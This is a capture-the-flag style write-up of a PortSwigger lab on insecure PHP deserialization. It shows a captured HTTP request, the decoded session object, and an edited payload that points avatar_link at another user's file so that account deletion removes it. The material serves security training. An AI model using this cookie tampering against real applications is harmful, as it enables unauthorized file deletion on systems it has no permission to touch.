PortSwigger Lab: Using application functionality to exploit insecure deserialization
Task
This lab uses a serialization-based session mechanism. A certain feature invokes a dangerous method on data provided in a serialized object. To solve the lab, edit the serialized object in the session cookie and use it to delete the morale.txt file from Carlos’s home directory.
You can log in to your own account using the following credentials: wiener:peter
You also have access to a backup account: gregg:rosebud
Attempt
After logging in, I found an account deletion feature. Deleted wiener account and captured the request:
POST /my-account/delete HTTP/2
Host: 0aa300ef04fe946f824a9ca300930093.web-security-academy.net
Cookie: session=Tzo0OiJVc2VyIjozOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJvd3NyaGFwbTcxdTM2cmJocjVyYXR1cDltZXFpa25mYSI7czoxMToiYXZhdGFyX2xpbmsiO3M6MTk6InVzZXJzL3dpZW5lci9hdmF0YXIiO30%3d
Content-Length: 0
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="133", "Not(A:Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Origin: https://0aa300ef04fe946f824a9ca300930093.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0aa300ef04fe946f824a9ca300930093.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
The session cookie is base64 encoded. Decoded it using Inspector (just select the text in Repeater and it will be shown on the panel to the right):
O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"owsrhapm71u36rbhr5ratup9meqiknfa";s:11:"avatar_link";s:19:"users/wiener/avatar";}
The format looks like serialized php data.
avatar_link points to users/wiener/avatar. Changed this to /home/carlos/morale.txt.
You can quickly count the length using python:
>>> print(len('/home/carlos/morale.txt'))
23
Edited serialized data and applied the change:
O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"owsrhapm71u36rbhr5ratup9meqiknfa";s:11:"avatar_link";s:23:"/home/carlos/morale.txt";}
Sent the request and it deleted the target file.